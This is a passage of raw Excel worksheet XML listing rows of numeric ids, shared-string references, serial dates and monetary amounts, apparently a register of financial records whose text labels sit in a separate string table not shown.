        <v>12032</v>
      </c>
      <c r="E2649">
        <v>16</v>
      </c>
      <c r="F2649" t="s">
        <v>4037</v>
      </c>
      <c r="G2649" s="1">
        <v>44117</v>
      </c>
      <c r="H2649">
        <v>850000</v>
      </c>
      <c r="J2649" t="s">
        <v>12033</v>
      </c>
    </row>
    <row r="2650" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2650">
        <v>22423</v>
      </c>
      <c r="B2650">
        <v>965</v>
      </c>
      <c r="C2650" t="s">
        <v>3586</v>
      </c>
      <c r="D2650" t="s">
        <v>12034</v>
      </c>
      <c r="E2650">
        <v>16</v>
      </c>
      <c r="F2650" t="s">
        <v>12035</v>
      </c>
      <c r="G2650" s="1">
        <v>44155</v>
      </c>
      <c r="H2650">
        <v>63350</v>
      </c>
      <c r="J2650" t="s">
        <v>12036</v>
      </c>
    </row>
    <row r="2651" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2651">
        <v>22424</v>
      </c>
      <c r="B2651">
        <v>965</v>
      </c>
      <c r="C2651" t="s">
        <v>3586</v>
      </c>
      <c r="D2651" t="s">
        <v>12034</v>
      </c>
      <c r="E2651">
        <v>16</v>
      </c>
      <c r="F2651" t="s">
        <v>9437</v>
      </c>
      <c r="G2651" s="1">
        <v>44155</v>
      </c>
      <c r="H2651">
        <v>44350</v>
      </c>
      <c r="J2651" t="s">
        <v>12037</v>
      </c>
    </row>
    <row r="2652" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2652">
        <v>22425</v>
      </c>
      <c r="B2652">
        <v>965</v>
      </c>
      <c r="C2652" t="s">
        <v>3586</v>
      </c>
      <c r="D2652" t="s">
        <v>12034</v>
      </c>
      <c r="E2652">
        <v>16</v>
      </c>
      <c r="F2652" t="s">
        <v>12038</v>
      </c>
      <c r="G2652" s="1">
        <v>44155</v>
      </c>
      <c r="H2652">
        <v>12670</v>
      </c>
      <c r="J2652" t="s">
        <v>12039</v>
      </c>
    </row>
    <row r="2653" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2653">
        <v>22426</v>
      </c>
      <c r="B2653">
        <v>965</v>
      </c>
      <c r="C2653" t="s">
        <v>3586</v>
      </c>
      <c r="D2653" t="s">
        <v>12034</v>
      </c>
      <c r="E2653">
        <v>16</v>
      </c>
      <c r="F2653" t="s">
        <v>2236</v>
      </c>
      <c r="G2653" s="1">
        <v>44155</v>
      </c>
      <c r="H2653">
        <v>45200</v>
      </c>
      <c r="J2653" t="s">
        <v>9752</v>
      </c>
    </row>
    <row r="2654" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2654">
        <v>22427</v>
      </c>
      <c r="B2654">
        <v>965</v>
      </c>
      <c r="C2654" t="s">
        <v>3586</v>
      </c>
      <c r="D2654" t="s">
        <v>12034</v>
      </c>
      <c r="E2654">
        <v>16</v>
      </c>
      <c r="F2654" t="s">
        <v>12040</v>
      </c>
      <c r="G2654" s="1">
        <v>44155</v>
      </c>
      <c r="H2654">
        <v>6340</v>
      </c>
      <c r="J2654" t="s">
        <v>10103</v>
      </c>
    </row>
    <row r="2655" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2655">
        <v>22434</v>
      </c>
      <c r="B2655">
        <v>656</v>
      </c>
      <c r="C2655" t="s">
        <v>680</v>
      </c>
      <c r="D2655" t="s">
        <v>10418</v>
      </c>
      <c r="E2655">
        <v>2</v>
      </c>
      <c r="F2655" t="s">
        <v>3814</v>
      </c>
      <c r="G2655" s="1">
        <v>44137</v>
      </c>
      <c r="H2655">
        <v>10000</v>
      </c>
      <c r="I2655" t="s">
        <v>9603</v>
      </c>
      <c r="J2655" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2656" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2656">
        <v>22435</v>
      </c>
      <c r="B2656">
        <v>656</v>
      </c>
      <c r="C2656" t="s">
        <v>680</v>
      </c>
      <c r="D2656" t="s">
        <v>10418</v>
      </c>
      <c r="E2656">
        <v>2</v>
      </c>
      <c r="F2656" t="s">
        <v>9527</v>
      </c>
      <c r="G2656" s="1">
        <v>44137</v>
      </c>
      <c r="H2656">
        <v>5000</v>
      </c>
      <c r="I2656" t="s">
        <v>9603</v>
      </c>
      <c r="J2656" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2657" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2657">
        <v>22436</v>
      </c>
      <c r="B2657">
        <v>656</v>
      </c>
      <c r="C2657" t="s">
        <v>680</v>
      </c>
      <c r="D2657" t="s">
        <v>10418</v>
      </c>
      <c r="E2657">
        <v>2</v>
      </c>
      <c r="F2657" t="s">
        <v>9577</v>
      </c>
      <c r="G2657" s="1">
        <v>44137</v>
      </c>
      <c r="H2657">
        <v>15000</v>
      </c>
      <c r="I2657" t="s">
        <v>9603</v>
      </c>
      <c r="J2657" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2658" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2658">
        <v>22437</v>
      </c>
      <c r="B2658">
        <v>656</v>
      </c>
      <c r="C2658" t="s">
        <v>680</v>
      </c>
      <c r="D2658" t="s">
        <v>10418</v>
      </c>
      <c r="E2658">
        <v>2</v>
      </c>
      <c r="F2658" t="s">
        <v>9928</v>
      </c>
      <c r="G2658" s="1">
        <v>44137</v>
      </c>
      <c r="H2658">
        <v>10000</v>
      </c>
      <c r="I2658" t="s">
        <v>9603</v>
      </c>
      <c r="J2658" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2659" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2659">
        <v>22438</v>
      </c>
      <c r="B2659">
        <v>1134</v>
      </c>
      <c r="C2659" t="s">
        <v>3448</v>
      </c>
      <c r="D2659" t="s">
        <v>11921</v>
      </c>
      <c r="E2659">
        <v>2</v>
      </c>
      <c r="F2659" t="s">
        <v>3814</v>
      </c>
      <c r="G2659" s="1">
        <v>44106</v>
      </c>
      <c r="H2659">
        <v>200000</v>
      </c>
      <c r="I2659" t="s">
        <v>9603</v>
      </c>
      <c r="J2659" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="2660" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2660">
        <v>22439</v>
      </c>
      <c r="B2660">
        <v>1134</v>
      </c>
      <c r="C2660" t="s">
        <v>3448</v>
      </c>
      <c r="D2660" t="s">
        <v>11921</v>
      </c>
      <c r="E2660">
        <v>2</v>
      </c>
      <c r="F2660" t="s">
        <v>9928</v>
      </c>
      <c r="G2660" s="1">
        <v>44106</v>
      </c>
      <c r="H2660">
        <v>200000</v>
      </c>
      <c r="I2660" t="s">
        <v>9603</v>
      </c>
      <c r="J2660" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="2661" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2661">
        <v>22440</v>
      </c>
      <c r="B2661">
        <v>1134</v>
      </c>
      <c r="C2661" t="s">
        <v>3448</v>
      </c>
      <c r="D2661" t="s">
        <v>11921</v>
      </c>
      <c r="E2661">
        <v>2</v>
      </c>
      <c r="F2661" t="s">
        <v>9577</v>
      </c>
      <c r="G2661" s="1">
        <v>44106</v>
      </c>
      <c r="H2661">
        <v>200000</v>
      </c>
      <c r="I2661" t="s">
        <v>9603</v>
      </c>
      <c r="J2661" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="2662" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2662">
        <v>22441</v>
      </c>
      <c r="B2662">
        <v>1134</v>
      </c>
      <c r="C2662" t="s">
        <v>3448</v>
      </c>
      <c r="D2662" t="s">
        <v>11921</v>
      </c>
      <c r="E2662">
        <v>2</v>
      </c>
      <c r="F2662" t="s">
        <v>9527</v>
      </c>
      <c r="G2662" s="1">
        <v>44106</v>
      </c>
      <c r="H2662">
        <v>200000</v>
      </c>
      <c r="I2662" t="s">
        <v>9603</v>
      </c>
      <c r="J2662" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="2663" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2663">
        <v>22442</v>
      </c>
      <c r="B2663">
        <v>1134</v>
      </c>
      <c r="C2663" t="s">
        <v>3448</v>
      </c>
      <c r="D2663" t="s">
        <v>11921</v>
      </c>
      <c r="E2663">
        <v>2</v>
      </c>
      <c r="F2663" t="s">
        <v>12041</v>
      </c>
      <c r="G2663" s="1">
        <v>44106</v>
      </c>
      <c r="H2663">
        <v>200000</v>
      </c>
      <c r="I2663" t="s">
        <v>9603</v>
      </c>
      <c r="J2663" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="2664" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2664">
        <v>22443</v>
      </c>
      <c r="B2664">
        <v>1134</v>
      </c>
      <c r="C2664" t="s">
        <v>3448</v>
      </c>
      <c r="D2664" t="s">
        <v>11921</v>
      </c>
      <c r="E2664">
        <v>2</v>
      </c>
      <c r="F2664" t="s">
        <v>12042</v>
      </c>
      <c r="G2664" s="1">
        <v>44106</v>
      </c>
      <c r="H2664">
        <v>200000</v>
      </c>
      <c r="I2664" t="s">
        <v>9603</v>
      </c>
      <c r="J2664" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="2665" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2665">
        <v>22444</v>
      </c>
      <c r="B2665">
        <v>1990</v>
      </c>
      <c r="C2665" t="s">
        <v>6287</v>
      </c>
      <c r="D2665" t="s">
        <v>12043</v>
      </c>
      <c r="E2665">
        <v>13</v>
      </c>
      <c r="F2665" t="s">
        <v>7564</v>
      </c>
      <c r="G2665" s="1">
        <v>44378</v>
      </c>
      <c r="H2665">
        <v>200000</v>
      </c>
      <c r="I2665" t="s">
        <v>9550</v>
      </c>
      <c r="J2665" t="s">
        <v>10065</v>
      </c>
    </row>
    <row r="2666" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2666">
        <v>22445</v>
      </c>
      <c r="B2666">
        <v>1230</v>
      </c>
      <c r="C2666" t="s">
        <v>16445</v>
      </c>
      <c r="D2666" t="s">
        <v>16446</v>
      </c>
      <c r="E2666">
        <v>26</v>
      </c>
      <c r="F2666" t="s">
        <v>3499</v>
      </c>
      <c r="G2666" s="1">
        <v>44144</v>
      </c>
      <c r="H2666" s="4">
        <v>150000</v>
      </c>
      <c r="I2666" t="s">
        <v>11301</v>
      </c>
      <c r="J2666" t="s">
        <v>12045</v>
      </c>
    </row>
    <row r="2667" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2667">
        <v>22446</v>
      </c>
      <c r="B2667">
        <v>1230</v>
      </c>
      <c r="C2667" t="s">
        <v>3572</v>
      </c>
      <c r="D2667" t="s">
        <v>12044</v>
      </c>
      <c r="E2667">
        <v>26</v>
      </c>
      <c r="F2667" t="s">
        <v>9497</v>
      </c>
      <c r="G2667" s="1">
        <v>44144</v>
      </c>
      <c r="H2667">
        <v>150000</v>
      </c>
      <c r="I2667" t="s">
        <v>11301</v>
      </c>
      <c r="J2667" t="s">
        <v>12045</v>
      </c>
    </row>
    <row r="2668" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2668">
        <v>22447</v>
      </c>
      <c r="B2668">
        <v>1265</v>
      </c>
      <c r="C2668" t="s">
        <v>3607</v>
      </c>
      <c r="D2668" t="s">
        <v>12046</v>
      </c>
      <c r="E2668">
        <v>29</v>
      </c>
      <c r="F2668" t="s">
        <v>2236</v>
      </c>
      <c r="G2668" s="1">
        <v>44126</v>
      </c>
      <c r="H2668">
        <v>3000000</v>
      </c>
      <c r="J2668" t="s">
        <v>12047</v>
      </c>
    </row>
    <row r="2669" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2669">
        <v>22449</v>
      </c>
      <c r="B2669">
        <v>1240</v>
      </c>
      <c r="C2669" t="s">
        <v>2554</v>
      </c>
      <c r="D2669" t="s">
        <v>9781</v>
      </c>
      <c r="E2669">
        <v>1</v>
      </c>
      <c r="F2669" t="s">
        <v>12048</v>
      </c>
      <c r="G2669" s="1">
        <v>44139</v>
      </c>
      <c r="H2669">
        <v>0</v>
      </c>
      <c r="I2669" t="s">
        <v>11907</v>
      </c>
      <c r="J2669" t="s">
        <v>12049</v>
      </c>
    </row>
    <row r="2670" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2670">
        <v>22450</v>
      </c>
      <c r="B2670">
        <v>954</v>
      </c>
      <c r="C2670" t="s">
        <v>3593</v>
      </c>
      <c r="D2670" t="s">
        <v>12050</v>
      </c>
      <c r="E2670">
        <v>29</v>
      </c>
      <c r="F2670" t="s">
        <v>12051</v>
      </c>
      <c r="G2670" s="1">
        <v>44218</v>
      </c>
      <c r="H2670">
        <v>100000</v>
      </c>
      <c r="I2670" t="s">
        <v>9965</v>
      </c>
    </row>
    <row r="2671" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2671">
        <v>22451</v>
      </c>
      <c r="B2671">
        <v>954</v>
      </c>
      <c r="C2671" t="s">
        <v>3593</v>
      </c>
      <c r="D2671" t="s">
        <v>12050</v>
      </c>
      <c r="E2671">
        <v>29</v>
      </c>
      <c r="F2671" t="s">
        <v>12052</v>
      </c>
      <c r="G2671" s="1">
        <v>44218</v>
      </c>
      <c r="H2671">
        <v>100000</v>
      </c>
      <c r="I2671" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="2672" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2672">
        <v>22452</v>
      </c>
      <c r="B2672">
        <v>954</v>
      </c>
      <c r="C2672" t="s">
        <v>3593</v>
      </c>
      <c r="D2672" t="s">
        <v>12050</v>
      </c>
      <c r="E2672">
        <v>29</v>
      </c>
      <c r="F2672" t="s">
        <v>4686</v>
      </c>
      <c r="G2672" s="1">
        <v>44218</v>
      </c>
      <c r="H2672">
        <v>200</v>
      </c>
      <c r="I2672" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="2673" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2673">
        <v>22453</v>
      </c>
      <c r="B2673">
        <v>954</v>
      </c>
      <c r="C2673" t="s">
        <v>3593</v>
      </c>
      <c r="D2673" t="s">
        <v>12050</v>
      </c>
      <c r="E2673">
        <v>29</v>
      </c>
      <c r="F2673" t="s">
        <v>2236</v>
      </c>
      <c r="G2673" s="1">
        <v>44218</v>
      </c>
      <c r="H2673">
        <v>200</v>
      </c>
      <c r="I2673" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="2674" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2674">
        <v>22454</v>
      </c>
      <c r="B2674">
        <v>1536</v>
      </c>
      <c r="C2674" t="s">
        <v>2718</v>
      </c>
      <c r="D2674" t="s">
        <v>10126</v>
      </c>
      <c r="E2674">
        <v>14</v>
      </c>
      <c r="F2674" t="s">
        <v>1746</v>
      </c>
      <c r="G2674" s="1">
        <v>44102</v>
      </c>
      <c r="H2674">
        <v>50000</v>
      </c>
      <c r="J2674" t="s">
        <v>12053</v>
      </c>
    </row>
    <row r="2675" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2675">
        <v>22455</v>
      </c>
      <c r="B2675">
        <v>1536</v>
      </c>
      <c r="C2675" t="s">
        <v>2718</v>
      </c>
      <c r="D2675" t="s">
        <v>10126</v>
      </c>
      <c r="E2675">
        <v>14</v>
      </c>
      <c r="F2675" t="s">
        <v>9722</v>
      </c>
      <c r="G2675" s="1">
        <v>44102</v>
      </c>
      <c r="H2675">
        <v>50000</v>
      </c>
      <c r="J2675" t="s">
        <v>12053</v>
      </c>
    </row>
    <row r="2676" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2676">
        <v>22456</v>
      </c>
      <c r="B2676">
        <v>2609</v>
      </c>
      <c r="C2676" t="s">
        <v>5768</v>
      </c>
      <c r="D2676" t="s">
        <v>11703</v>
      </c>
      <c r="E2676">
        <v>16</v>
      </c>
      <c r="F2676" t="s">
        <v>9433</v>
      </c>
      <c r="G2676" s="1">
        <v>44090</v>
      </c>
      <c r="H2676">
        <v>500</v>
      </c>
      <c r="J2676" t="s">
        <v>12054</v>
      </c>
    </row>
    <row r="2677" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2677">
        <v>22457</v>
      </c>
      <c r="B2677">
        <v>1098</v>
      </c>
      <c r="C2677" t="s">
        <v>3489</v>
      </c>
      <c r="D2677" t="s">
        <v>12055</v>
      </c>
      <c r="E2677">
        <v>14</v>
      </c>
      <c r="F2677" t="s">
        <v>12056</v>
      </c>
      <c r="G2677" s="1">
        <v>44188</v>
      </c>
      <c r="H2677">
        <v>200000</v>
      </c>
      <c r="J2677" t="s">
        <v>12057</v>
      </c>
    </row>
    <row r="2678" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2678">
        <v>22458</v>
      </c>
      <c r="B2678">
        <v>1098</v>
      </c>
      <c r="C2678" t="s">
        <v>3489</v>
      </c>
      <c r="D2678" t="s">
        <v>12055</v>
      </c>
      <c r="E2678">
        <v>14</v>
      </c>
      <c r="F2678" t="s">
        <v>12058</v>
      </c>
      <c r="G2678" s="1">
        <v>44188</v>
      </c>
      <c r="H2678">
        <v>200000</v>
      </c>
      <c r="J2678" t="s">
        <v>12057</v>
      </c>
    </row>
    <row r="2679" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2679">
        <v>22459</v>
      </c>
      <c r="B2679">
        <v>1098</v>
      </c>
      <c r="C2679" t="s">
        <v>3489</v>
      </c>
      <c r="D2679" t="s">
        <v>12055</v>
      </c>
      <c r="E2679">
        <v>14</v>
      </c>
      <c r="F2679" t="s">
        <v>9437</v>
      </c>
      <c r="G2679" s="1">
        <v>44188</v>
      </c>
      <c r="H2679">
        <v>50000</v>
      </c>
      <c r="J2679" t="s">
        <v>12057</v>
      </c>
    </row>
    <row r="2680" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2680">
        <v>22460</v>
      </c>
      <c r="B2680">
        <v>1098</v>
      </c>
      <c r="C2680" t="s">
        <v>3489</v>
      </c>
      <c r="D2680" t="s">
        <v>12055</v>
      </c>
      <c r="E2680">
        <v>14</v>
      </c>
      <c r="F2680" t="s">
        <v>9595</v>
      </c>
      <c r="G2680" s="1">
        <v>44188</v>
      </c>
      <c r="H2680">
        <v>50000</v>
      </c>
      <c r="J2680" t="s">
        <v>12057</v>
      </c>
    </row>
    <row r="2681" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2681">
        <v>22461</v>
      </c>
      <c r="B2681">
        <v>1098</v>
      </c>
      <c r="C2681" t="s">
        <v>3489</v>
      </c>
      <c r="D2681" t="s">
        <v>12055</v>
      </c>
      <c r="E2681">
        <v>14</v>
      </c>
      <c r="F2681" t="s">
        <v>2236</v>
      </c>
      <c r="G2681" s="1">
        <v>44188</v>
      </c>
      <c r="H2681">
        <v>150000</v>
      </c>
      <c r="J2681" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2682" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2682">
        <v>22462</v>
      </c>
      <c r="B2682">
        <v>1098</v>
      </c>
      <c r="C2682" t="s">
        <v>3489</v>
      </c>
      <c r="D2682" t="s">
        <v>12055</v>
      </c>
      <c r="E2682">
        <v>14</v>
      </c>
      <c r="F2682" t="s">
        <v>3763</v>
      </c>
      <c r="G2682" s="1">
        <v>44188</v>
      </c>
      <c r="H2682">
        <v>95000</v>
      </c>
      <c r="J2682" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2683" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2683">
        <v>22463</v>
      </c>
      <c r="B2683">
        <v>1098</v>
      </c>
      <c r="C2683" t="s">
        <v>3489</v>
      </c>
      <c r="D2683" t="s">
        <v>12055</v>
      </c>
      <c r="E2683">
        <v>14</v>
      </c>
      <c r="F2683" t="s">
        <v>9435</v>
      </c>
      <c r="G2683" s="1">
        <v>44188</v>
      </c>
      <c r="H2683">
        <v>100000</v>
      </c>
      <c r="J2683" t="s">
        <v>12057</v>
      </c>
    </row>
    <row r="2684" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2684">
        <v>22464</v>
      </c>
      <c r="B2684">
        <v>1098</v>
      </c>
      <c r="C2684" t="s">
        <v>3489</v>
      </c>
      <c r="D2684" t="s">
        <v>12055</v>
      </c>
      <c r="E2684">
        <v>14</v>
      </c>
      <c r="F2684" t="s">
        <v>12059</v>
      </c>
      <c r="G2684" s="1">
        <v>44188</v>
      </c>
      <c r="H2684">
        <v>10000</v>
      </c>
      <c r="J2684" t="s">
        <v>12057</v>
      </c>
    </row>
    <row r="2685" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2685">
        <v>22465</v>
      </c>
      <c r="B2685">
        <v>1098</v>
      </c>
      <c r="C2685" t="s">
        <v>3489</v>
      </c>
      <c r="D2685" t="s">
        <v>12055</v>
      </c>
      <c r="E2685">
        <v>14</v>
      </c>
      <c r="F2685" t="s">
        <v>1746</v>
      </c>
      <c r="G2685" s="1">
        <v>44188</v>
      </c>
      <c r="H2685">
        <v>80000</v>
      </c>
      <c r="J2685" t="s">
        <v>12057</v>
      </c>
    </row>
    <row r="2686" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2686">
        <v>22466</v>
      </c>
      <c r="B2686">
        <v>1098</v>
      </c>
      <c r="C2686" t="s">
        <v>3489</v>
      </c>
      <c r="D2686" t="s">
        <v>12055</v>
      </c>
      <c r="E2686">
        <v>14</v>
      </c>
      <c r="F2686" t="s">
        <v>9459</v>
      </c>
      <c r="G2686" s="1">
        <v>44188</v>
      </c>
      <c r="H2686">
        <v>0</v>
      </c>
      <c r="J2686" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2687" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2687">
        <v>22467</v>
      </c>
      <c r="B2687">
        <v>1098</v>
      </c>
      <c r="C2687" t="s">
        <v>3489</v>
      </c>
      <c r="D2687" t="s">
        <v>12055</v>
      </c>
      <c r="E2687">
        <v>14</v>
      </c>
      <c r="F2687" t="s">
        <v>9849</v>
      </c>
      <c r="G2687" s="1">
        <v>44188</v>
      </c>
      <c r="H2687">
        <v>5000</v>
      </c>
      <c r="J2687" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2688" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2688">
        <v>22468</v>
      </c>
      <c r="B2688">
        <v>1098</v>
      </c>
      <c r="C2688" t="s">
        <v>3489</v>
      </c>
      <c r="D2688" t="s">
        <v>12055</v>
      </c>
      <c r="E2688">
        <v>14</v>
      </c>
      <c r="F2688" t="s">
        <v>9523</v>
      </c>
      <c r="G2688" s="1">
        <v>44188</v>
      </c>
      <c r="H2688">
        <v>0</v>
      </c>
      <c r="J2688" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2689" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2689">
        <v>22469</v>
      </c>
      <c r="B2689">
        <v>4880</v>
      </c>
      <c r="C2689" t="s">
        <v>7698</v>
      </c>
      <c r="D2689" t="s">
        <v>12060</v>
      </c>
      <c r="E2689">
        <v>12</v>
      </c>
      <c r="F2689" t="s">
        <v>364</v>
      </c>
      <c r="G2689" s="1">
        <v>44168</v>
      </c>
      <c r="H2689">
        <v>120000</v>
      </c>
      <c r="J2689" t="s">
        <v>12061</v>
      </c>
    </row>
    <row r="2690" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2690">
        <v>22470</v>
      </c>
      <c r="B2690">
        <v>506</v>
      </c>
      <c r="C2690" t="s">
        <v>1959</v>
      </c>
      <c r="D2690" t="s">
        <v>12062</v>
      </c>
      <c r="E2690">
        <v>29</v>
      </c>
      <c r="F2690" t="s">
        <v>4686</v>
      </c>
      <c r="G2690" s="1">
        <v>44103</v>
      </c>
      <c r="H2690">
        <v>3756000</v>
      </c>
      <c r="I2690" t="s">
        <v>9952</v>
      </c>
      <c r="J2690" t="s">
        <v>12063</v>
      </c>
    </row>
    <row r="2691" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2691">
        <v>22471</v>
      </c>
      <c r="B2691">
        <v>506</v>
      </c>
      <c r="C2691" t="s">
        <v>1959</v>
      </c>
      <c r="D2691" t="s">
        <v>12062</v>
      </c>
      <c r="E2691">
        <v>29</v>
      </c>
      <c r="F2691" t="s">
        <v>2236</v>
      </c>
      <c r="G2691" s="1">
        <v>44103</v>
      </c>
      <c r="H2691">
        <v>2253000</v>
      </c>
      <c r="I2691" t="s">
        <v>9952</v>
      </c>
      <c r="J2691" t="s">
        <v>12064</v>
      </c>
    </row>
    <row r="2692" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2692">
        <v>22472</v>
      </c>
      <c r="B2692">
        <v>506</v>
      </c>
      <c r="C2692" t="s">
        <v>1959</v>
      </c>
      <c r="D2692" t="s">
        <v>12062</v>
      </c>
      <c r="E2692">
        <v>29</v>
      </c>
      <c r="F2692" t="s">
        <v>12065</v>
      </c>
      <c r="G2692" s="1">
        <v>44103</v>
      </c>
      <c r="H2692">
        <v>30000</v>
      </c>
      <c r="J2692" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2693" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2693">
        <v>22473</v>
      </c>
      <c r="B2693">
        <v>506</v>
      </c>
      <c r="C2693" t="s">
        <v>1959</v>
      </c>
      <c r="D2693" t="s">
        <v>12062</v>
      </c>
      <c r="E2693">
        <v>29</v>
      </c>
      <c r="F2693" t="s">
        <v>9437</v>
      </c>
      <c r="G2693" s="1">
        <v>44103</v>
      </c>
      <c r="H2693">
        <v>10000</v>
      </c>
      <c r="J2693" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="2694" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2694">
        <v>22474</v>
      </c>
      <c r="B2694">
        <v>4778</v>
      </c>
      <c r="C2694" t="s">
        <v>7634</v>
      </c>
      <c r="D2694" t="s">
        <v>12066</v>
      </c>
      <c r="E2694">
        <v>2</v>
      </c>
      <c r="F2694" t="s">
        <v>547</v>
      </c>
      <c r="G2694" s="1">
        <v>44176</v>
      </c>
      <c r="H2694">
        <v>3000</v>
      </c>
      <c r="I2694" t="s">
        <v>9952</v>
      </c>
      <c r="J2694" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="2695" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2695">
        <v>22475</v>
      </c>
      <c r="B2695">
        <v>4778</v>
      </c>
      <c r="C2695" t="s">
        <v>7634</v>
      </c>
      <c r="D2695" t="s">
        <v>12066</v>
      </c>
      <c r="E2695">
        <v>2</v>
      </c>
      <c r="F2695" t="s">
        <v>9453</v>
      </c>
      <c r="G2695" s="1">
        <v>44176</v>
      </c>
      <c r="H2695">
        <v>500</v>
      </c>
      <c r="I2695" t="s">
        <v>10003</v>
      </c>
      <c r="J2695" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2696" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2696">
        <v>22476</v>
      </c>
      <c r="B2696">
        <v>4778</v>
      </c>
      <c r="C2696" t="s">
        <v>7634</v>
      </c>
      <c r="D2696" t="s">
        <v>12066</v>
      </c>
      <c r="E2696">
        <v>2</v>
      </c>
      <c r="F2696" t="s">
        <v>3204</v>
      </c>
      <c r="G2696" s="1">
        <v>44176</v>
      </c>
      <c r="H2696">
        <v>2500</v>
      </c>
      <c r="I2696" t="s">
        <v>10003</v>
      </c>
      <c r="J2696" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2697" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2697">
        <v>22477</v>
      </c>
      <c r="B2697">
        <v>4778</v>
      </c>
      <c r="C2697" t="s">
        <v>7634</v>
      </c>
      <c r="D2697" t="s">
        <v>12066</v>
      </c>
      <c r="E2697">
        <v>2</v>
      </c>
      <c r="F2697" t="s">
        <v>12067</v>
      </c>
      <c r="G2697" s="1">
        <v>44176</v>
      </c>
      <c r="H2697">
        <v>10000</v>
      </c>
      <c r="I2697" t="s">
        <v>10003</v>
      </c>
      <c r="J2697" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2698" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2698">
        <v>22478</v>
      </c>
      <c r="B2698">
        <v>1408</v>
      </c>
      <c r="C2698" t="s">
        <v>2796</v>
      </c>
      <c r="D2698" t="s">
        <v>12027</v>
      </c>
      <c r="E2698">
        <v>11</v>
      </c>
      <c r="F2698" t="s">
        <v>9430</v>
      </c>
      <c r="G2698" s="1">
        <v>44126</v>
      </c>
      <c r="H2698">
        <v>10000</v>
      </c>
      <c r="I2698" t="s">
        <v>11301</v>
      </c>
    </row>
    <row r="2699" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2699">
        <v>22479</v>
      </c>
      <c r="B2699">
        <v>1951</v>
      </c>
      <c r="C2699" t="s">
        <v>6166</v>
      </c>
      <c r="D2699" t="s">
        <v>11694</v>
      </c>
      <c r="E2699">
        <v>31</v>
      </c>
      <c r="F2699" t="s">
        <v>12068</v>
      </c>
      <c r="G2699" s="1">
        <v>44098</v>
      </c>
      <c r="H2699">
        <v>150000</v>
      </c>
      <c r="I2699" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2700" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2700">
        <v>22480</v>
      </c>
      <c r="B2700">
        <v>1951</v>
      </c>
      <c r="C2700" t="s">
        <v>6166</v>
      </c>
      <c r="D2700" t="s">
        <v>11694</v>
      </c>
      <c r="E2700">
        <v>31</v>
      </c>
      <c r="F2700" t="s">
        <v>2236</v>
      </c>
      <c r="G2700" s="1">
        <v>44098</v>
      </c>
      <c r="H2700">
        <v>60000</v>
      </c>
      <c r="J2700" t="s">
        <v>9538</v>
      </c>
    </row>
